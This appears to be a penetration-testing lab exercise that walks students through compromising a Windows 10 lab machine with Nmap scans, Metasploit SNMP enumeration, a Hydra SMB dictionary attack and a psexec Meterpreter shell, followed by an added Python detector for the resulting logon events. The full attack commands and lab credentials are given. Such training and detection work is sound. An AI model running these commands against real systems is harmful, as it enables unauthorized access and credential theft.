Exercise 7: Gaining Remote Access to a Windows 10 Machine
Scenario
SNMP and SMB are considered two of the most vulnerable protocols; when they are running on a machine, they may allow attackers to gain partial or complete access to it. In this lab, we will perform internal network penetration testing on the Subnet D machines and, upon finding the machine running SNMP and SMB services, we will:
- Enumerate the user accounts using the SNMP service
- Collect the enumerated usernames and perform a dictionary attack using them along with a combination of passwords
- Use the cracked usernames and passwords to gain shell access to the machine
The objective of this lab is to help students understand techniques such as:
i. SNMP Enumeration
ii. SMB OS Discovery
iii. Password dictionary attack using Hydra
iv. Microsoft Windows Authenticated User Code Execution
Lab Duration: 30 Minutes
- Click Kali Linux (Internal Network). If the Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
- Type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- In this lab, we will scan a subnet for live machines, select one machine, and pentest that machine to gain access to it.
For a quick scan, we will do a ping sweep using Nmap. In this lab, we are choosing an internal network (Subnet D) for pentesting.
Launch a command line terminal, type nmap -sP 172.20.20.1-255 and press Enter.
This displays all the hosts that are up in the network within a minute. In this lab, we are choosing 172.20.20.11 (Sales Department Subnet D) as our target.
- Type nmap -T3 -sT -sU -A 172.20.20.11 in the command line terminal and press Enter.
With this command, we perform an Nmap scan to view all the open and filtered TCP and UDP ports on the Sales Department Subnet D machine, along with the services and their versions.
The scan takes around 20 minutes.
Upon completion of the scan, you will observe that ports 445 and 161 are open, with the SNMP service running on the target machine, as shown in the screenshot below:
The SNMP service has a common community name public, which we will be exploiting in the forthcoming tasks.
- Scroll down the scan result to view the operating system running on the target machine.
From the Nmap result, the operating system running on the target is identified as Windows 10, meaning it does not have any vulnerabilities at the OS level.
- Now, we shall use the snmp_login auxiliary module to see if we can log in to the SNMP device using a common community name (public).
So, type msfconsole and press Enter to launch msfconsole.
- Type use auxiliary/scanner/snmp/snmp_login and press Enter to use the auxiliary scanner.
- Type show options and press Enter to view the options associated with the module. We will be setting RHOSTS (target IP address) in this module to run it on the target.
- Type setg rhosts 172.20.20.11 in the terminal and press Enter.
- Type exploit and press Enter.
This will perform a brute-force attack on the SNMP community name and, upon finding the name, it will log in with it, as shown in the screenshot below:
- Type use auxiliary/scanner/snmp/snmp_enum and press Enter.
The snmp_enum module allows enumeration of any devices with SNMP protocol support. It supports hardware, software, and network information. The default community name used is "public", using which we logged in to the target machine in the previous step.
- Type exploit and press Enter.
- This will enumerate the target machine and list down information including User accounts, System information, Network information, Network interfaces, etc.
Now, we need to note down the enumerated usernames into a text file.
Minimize the msfconsole command line terminal.
- Launch a new command line terminal, type touch Usernames.txt, and press Enter.
This creates a new text file named Usernames.txt in the home folder.
Minimize the command line terminal.
- Go to the home folder and open Usernames.txt. Enter the usernames that were enumerated in Task 14.
You will use this file along with the Passwords.txt file in Hydra to perform a dictionary attack and see whether any user credentials can be cracked.
- Now, we shall use hydra to perform an SMB dictionary attack. For this, we will be using the Usernames.txt file located in the home (root) folder and Passwords.txt file located in the /root/Wordlists folder.
Maximize the command line terminal where you created the text file, type hydra -L /root/Usernames.txt -P /root/Wordlists/Passwords.txt 172.20.20.11 smb and press Enter. This will initiate the dictionary attack on the target machine (Sales Department Subnet D) as shown in the screenshot below:
- Hydra performs a dictionary attack on the target machine and displays the cracked user credentials as shown in the screenshot:
- Upon running an Nmap scan in Task 5, it was observed that port 3389 was closed, meaning RDP service is disabled on the target machine.
So, in order to access the machine, we will use the Metasploit psexec module to gain Meterpreter access.
Maximize the msfconsole terminal which you minimized in Task 14.
Type use exploit/windows/smb/psexec in the msfconsole and press Enter.
- To view the options that need to be set, type show options and press Enter.
This displays the options associated with the module.
We need to set the rhost, smbuser and smbpass options in the module.
- Issue the following commands in the console:
- set rhost 172.20.20.11
- set smbuser Admin
- set smbpass test@123
- Now type exploit and press Enter. The psexec module uses the specified credentials on the 172.20.20.11 (Windows 10) machine and gains a Meterpreter shell, giving us access to the machine.
- Thus, we made use of the vulnerable services running on the Windows 10 machine to gain unauthorized access to it.
In this lab, you have learned how to compromise a machine running SNMP and SMB protocols.
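From the defender's side, the Hydra SMB dictionary attack and the subsequent psexec logon performed in this lab leave a recognizable trail in the Windows Security log: a burst of failed network logons (Event ID 4625, Logon Type 3) from one source address against several usernames, followed by a successful network logon (Event ID 4624) from the same source. The following script is an added example, not part of this lab; the event field names are simplified and the sample events are constructed, not real logs.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Field names are simplified from
# the Security log's EventData: 4625 = failed logon, 4624 = successful logon,
# LogonType 3 = network logon, which is what SMB authentication produces.
def _ev(sec, eid, user, src="172.20.20.5", ltype=3):
    return {"time": f"2024-05-01T10:00:{sec:02d}", "id": eid,
            "user": user, "logon_type": ltype, "src": src}

SAMPLE_EVENTS = (
    [_ev(i, 4625, ["Admin", "sales1", "sales2"][i % 3]) for i in range(12)]  # dictionary attack
    + [_ev(13, 4624, "Admin")]                                 # the credential that worked
    + [_ev(20, 4625, "sales1", src="172.20.20.9")]             # a single mistyped password
    + [_ev(30, 4624, "sales2", src="172.20.20.9", ltype=2)]    # interactive logon, not SMB
)

def detect_smb_dictionary_attack(events, window=timedelta(minutes=5),
                                 min_failures=10, min_users=2):
    """Group network logons by source address and flag any source whose
    4625 count inside one window reaches the threshold across several
    usernames. A 4624 from a flagged source after the burst names the
    account whose password was in the attacker's list."""
    by_src = defaultdict(list)
    for e in events:
        if e["logon_type"] == 3:  # only network (SMB-style) logons matter here
            by_src[e["src"]].append((datetime.fromisoformat(e["time"]), e))
    findings = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda te: te[0])
        fails = [(t, e["user"]) for t, e in evs if e["id"] == 4625]
        for i, (start, _) in enumerate(fails):
            in_win = [u for t, u in fails[i:] if t - start <= window]
            if len(in_win) >= min_failures and len(set(in_win)) >= min_users:
                success = [e["user"] for t, e in evs
                           if e["id"] == 4624 and t >= start]
                findings[src] = {"failures": len(in_win),
                                 "usernames": sorted(set(in_win)),
                                 "compromised_account": success[0] if success else None}
                break  # one finding per source is enough
    return findings

if __name__ == "__main__":
    for src, f in detect_smb_dictionary_attack(SAMPLE_EVENTS).items():
        print(f"{src}: {f['failures']} failures against {f['usernames']}, "
              f"then success as {f['compromised_account']}")
```

A single failed logon from the second source is not flagged, and the interactive logon is ignored, so the detector isolates the spray-then-success pattern rather than ordinary mistyped passwords.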